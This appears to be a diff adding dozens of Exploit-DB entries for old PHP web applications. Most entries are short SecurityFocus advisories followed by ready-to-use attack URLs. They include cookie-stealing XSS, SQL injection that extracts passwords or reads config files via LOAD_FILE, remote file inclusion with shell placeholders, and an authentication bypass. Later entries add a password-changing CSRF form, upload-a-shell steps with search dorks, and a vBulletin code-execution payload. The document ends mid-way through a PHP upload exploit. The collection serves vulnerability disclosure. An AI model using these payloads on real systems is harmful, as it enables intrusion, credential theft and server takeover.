Particle Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Particle Gallery 1.0.1 and prior versions.
http://www.example.com/apppath/search.php?user=admin&order=>"><ScRiPt%20%0a%0d>alert(1111110)%3B</ScRiPt>

10
platforms/php/webapps/30111.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24249/info
myBloggie is prone to an SQL-injection vulnerability.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
This issue affects myBloggie 2.1.6 and earlier.
http://www.example.com/apppath/index.php?mode=viewuser&cat_id='
http://www.example.com/apppath/index.php?mode=viewuser&month_no=4&year="

10
platforms/php/webapps/30112.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*
Read database credentials:
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696
775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,6/**/from/**/Accounts/*

7
platforms/php/webapps/30113.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*

7
platforms/php/webapps/30114.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/Authenticate.php?sUName=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

7
platforms/php/webapps/30115.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

11
platforms/php/webapps/30116.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iDBLoc=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iTtlNumItems=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?&iNumPerPage=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?sSort=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

10
platforms/php/webapps/30118.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/gestion/index.php?path_inc=[shell]

9
platforms/php/webapps/30119.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/identification.php?path_inc=[shell]

9
platforms/php/webapps/30120.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/disconnect.php?path_inc=[shell]

9
platforms/php/webapps/30121.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/loginliste.php?path_inc=[shell]

9
platforms/php/webapps/30122.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/loginmodif.php?path_inc=[shell]

9
platforms/php/webapps/30123.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script//ident/index.php?path_inc=[shell]

9
platforms/php/webapps/30124.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/ident.inc.php?path_inc=[shell]

9
platforms/php/webapps/30125.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/menu/menuprincipal.php?path_inc=[shell]

9
platforms/php/webapps/30126.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/param/param.inc.php?path_inc=[shell]

9
platforms/php/webapps/30127.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell]

9
platforms/php/webapps/30128.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/index.php?path_inc=[shell]

9
platforms/php/webapps/30129.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/common.inc.php?path_inc=[shell]

9
platforms/php/webapps/30131.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24269/info
Buttercup WFM (Web File Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue is reported to affect the Buttercup WFM - May 2007 edition. Other versions could also be affected.
http://www.example.com/index.php?title=%3Cscript%3Ealert(1)%3C/script%3E

7
platforms/php/webapps/30132.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24270/info
Evenzia CMS is prone to a cross-site script vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script>

9
platforms/php/webapps/30133.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/chat.php?sid=<script>alert(123);</script>

9
platforms/php/webapps/30134.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> http://www.example.com/phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script>

9
platforms/php/webapps/30135.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/admin/header.php?admin[name]=<script>alert(123);</script>

9
platforms/php/webapps/30136.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/super/info.php?BASE_URL=<script>alert(123);</script>

10
platforms/php/webapps/30137.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
http://www.example.com/phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script> http://www.example.com/phplive/setup/footer.php?nav_line=<script>alert(123);</script>

7
platforms/php/webapps/30138.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24277/info
Codelib Linker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?cat=[xss]

7
platforms/php/webapps/30140.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24285/info
Okyanusmedya is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?pages=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E http://www.example.com/index.php?pages=menu=3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E

18
platforms/php/webapps/30143.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/24297/info
WebStudio CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/?pageid=[XSS]
http://www.example.com/?pageid=[XSS]
http://www.example.com/?pageid=[XSS]
http://www.example.com/?pageid=-->[XSS]
http://www.example.com/?pageid=email@address.com[XSS]domain.com
http://www.example.com/?pageid=[XSS]
http://www.example.com/index.php?pageid=>'>[XSS]
http://www.example.com/index.php?pageid=[XSS]
http://www.example.com/index.php?pageid=[XSS]
http://www.example.com/index.php?pageid=-->[XSS]
http://www.example.com/index.php?pageid=email@address.com[XSS]domain.com
http://www.example.com/index.php?pageid=[XSS]

7
platforms/php/webapps/30152.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24311/info
My DataBook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%27 http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%00'

7
platforms/php/webapps/30153.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24311/info
My DataBook is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/apppath/diary.php?Sec=diary&month=06&year=</title><ScRiPt%20%0a%0d>alert(123123123)%3B</ScRiPt>&day=01

26
platforms/php/webapps/30155.txt Executable file
View file

@ -0,0 +1,26 @@
###############################################################
# Exploit Title: Wordpress TDO-Mini-Forms Plugin Arbitrary File Upload
Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/09/2013
# Vendor Homepage: http://thedeadone.net
# Software Link :
http://cznic.dl.sourceforge.net/project/filip/wordpress/tdo-mini-forms.0.13.9.zip
# Google dork: inurl:/wp-content/plugins/tdo-mini-forms/
# Tested on: Windows/Linux
###############################################################
# Exploit :
= = = = = =
1.Go to http://
[target]/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=[ID]&index=
2.Click To Browse And Select Your Shell Script(ex file.php.jpg)
3.Clict to Upload Now for upload
# Uploaded files :
http://127.0.0.1/wp-content/uploads/tdomf/tmp/[FormID]/[YourIP]/file.php.jpg
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #

9
platforms/php/webapps/30157.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24342/info
JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
JD-Wiki 1.0.2 and earlier versions are vulnerable to this issue; other versions may also be affected.
http://www.example.com/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=

9
platforms/php/webapps/30158.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24342/info
JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
JD-Wiki 1.0.2 and earlier versions are vulnerable to this issue; other versions may also be affected.
http://www.example.com/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=

9
platforms/php/webapps/30161.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24363/info
Atom PhotoBlog is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input data before rendering it in a user's browser. These issues include multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability.
Attackers could exploit these issues to steal cookie-based authentication credentials from legitimate users of the site; other attacks are also possible.
Versions prior to Atom PhotoBlog 1.0.9.1 are vulnerable.
http://www.example.com/atomphotoblog/atomPhotoBlog.php?do=index&tag=<ScRiPt%20%0a%0d>alert(1566213939)%3B</ScRiPt>

10
platforms/php/webapps/30162.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24365/info
WmsCMS is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input data before rendering it in a user's browser.
Attackers could exploit these issues to steal cookie-based authentication credentials from legitimate users of the site; other attacks are also possible.
WmsCMS 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/4print.asp?p=60&sbl=>">[XSS]
http://www.example.com/4print.asp?p=60&sbr=>">[XSS]

9
platforms/php/webapps/30166.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24383/info
WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
WordPress 2.2. is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"><script>alert(1)</script>

7
platforms/php/webapps/30168.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24397/info
vBSupport is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
http://www.example.com/4/vBSupport.php?do=showticket&ticketid=[SQL]

9
platforms/php/webapps/30170.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24413/info
Beehive Forum is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage any of these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Beehive Forum 0.71 is vulnerable; other versions may also be affected.
http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>".><script>alert(1);</script> http://www.example.com/forum/links.php?webtag=FOEUM_NAME&fid=>".><script>alert(1);</script>&viewmode=1 http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script>

9
platforms/php/webapps/30171.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24414/info
Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database, access sensitive information, and obtain cookie-based authentication credentials.
These issues affect versions prior to JFFNMS 0.8.4-pre3.
http://www.example.com/auth.php?user='%20union%20select%202,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&pass=

9
platforms/php/webapps/30172.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24414/info
Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database, access sensitive information, and obtain cookie-based authentication credentials.
These issues affect versions prior to JFFNMS 0.8.4-pre3.
http://www.example.com/auth.php?user=[xss]

9
platforms/php/webapps/30173.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24414/info
Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database, access sensitive information, and obtain cookie-based authentication credentials.
These issues affect versions prior to JFFNMS 0.8.4-pre3.
http://192.168.1.1/admin/adm/test.php

9
platforms/php/webapps/30174.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24414/info
Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database, access sensitive information, and obtain cookie-based authentication credentials.
These issues affect versions prior to JFFNMS 0.8.4-pre3.
http://192.168.1.1/admin/setup.php

7
platforms/php/webapps/30175.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24422/info
BBpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
GET /bb-login.php?re="><script>alert(1);</script> HTTP/1.0 Host: www.some.site Referer: http://www.some.site/

45
platforms/php/webapps/30177.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit Title : PlaySMS <= 0.9.9.2 CSRF
# Date : 2013/12/9
# Exploit Author : Saadat Ullah ? saadi_linux@rocketmail.com
# Software Link : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
PoC and Exploit to change user password:
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="ex"action="http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save" method=post enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=up_password value="admin">
<input type=hidden size=30 maxlength=30 name=up_password_conf value="admin">
<input type=hidden size=30 maxlength=100 name=up_name value="admin">
<input type=hidden size=30 maxlength=30 name=up_email value="admin@gmail.com">
<td><input type=hidden size=30 maxlength=250 name=up_address value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_city value=""></td>
<td><input type=hidden size=30 maxlength=100 name=up_state value=""></td>
<td><input type=hidden size=10 maxlength=10 name=up_zipcode value=""></td>
<input type=submit class=button value='Save'>
</form>
</html>
#Independent Pakistani Security Researcher

10
platforms/php/webapps/30180.txt Executable file
View file

@ -0,0 +1,10 @@
# Exploit Title:vBulletin 5.?.x Remote Code Execution
# Date: 09/12/13
# Exploit Author: @sergioyoshiman (Sergio Yoshikata)
# Vendor Homepage:https://www.*vbulletin*.com/
# Versions affected : 2012
Injector team was selling this exploit for 700 $ a complete shit and
only 10 % are vulnerable.
The exploit
search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query=%24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthreadid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0

9
platforms/php/webapps/30190.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24479/info
The Joomla! Letterman Subscriber module is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Joomla! Letterman Subscriber 1.2.4-RC1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?option=com_letterman&task=view&id=1&Itemid=1"><script>alert(String.fromCharCode(88,83,83))</script>

9
platforms/php/webapps/30197.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24513/info
WSPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects WSPortal 1.0; other versions may also be vulnerable.
http://www.example.com/[WSPORTAL-DIRECTORY]/content.php?page=0' UNION SELECT `username`,`password` FROM `users` WHERE '1

9
platforms/php/webapps/30200.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24517/info
Php Hosting Biller is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Php Hosting Biller 1.0; other versions may also be vulnerable.
http://www.example.com/app_path/index.php/%3E%22%3E%3CScRiPt%3Ealert(1234)%3C/ScRiPt%3E

9
platforms/php/webapps/30201.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24522/info
Fuzzylime is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Fuzzylime 1.01b and prior versions are vulnerable to this issue.
http://www.example.com/path/low.php?action=log&fromforum=111-222-1933email@address.com&fromtopic=111-222-1933email@address.com&fromaction=>"><ScRiPt%20%0a%0d>alert(21 407654)%3B</ScRiPt>

44
platforms/php/webapps/30213.txt Executable file
View file

@ -0,0 +1,44 @@
###########################################################
EDB Note: Screenshot provided by exploit author.
###########################################################
[~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple
Parameters
[~] Author: sajith
[~] version: eFront v3.6.14- build 18012
[~]Vendor Homepage: http://www.efrontlearning.net/
[~] vulnerable app link:http://www.efrontlearning.net/download
###########################################################
POC by sajith shetty:
[###]Log in with admin account and create new user
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1
(Home ? Users ? Administrator S. (root) ? New user)
Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x
onerror=prompt(1);> ]
[###]create new lesson option (
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?
ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss
[payload:"><img src=x onerror=prompt(1);> ]
[###]create new courses option(
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?
ctg=courses&add_course=1) where "Course name:" filed is vulnerable to
stored XSS

31
platforms/php/webapps/30214.txt Executable file
View file

@ -0,0 +1,31 @@
###############################################################
# Exploit Title: Wordpress Skinizer theme Remote File Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/11/2013
# Vendor Homepage: http://themeforest.net
# Software Link: http://prefiles.com/9dgxv5102nkp/Skinizer.WordPress.v1.0.4.rar
# Google dork: Use your brain :)
# Tested on: Windows/Linux
###############################################################
1) Exploit :
= = = = = =
<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/themes/skinizer/framework/_scripts/valums_uploader/php.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
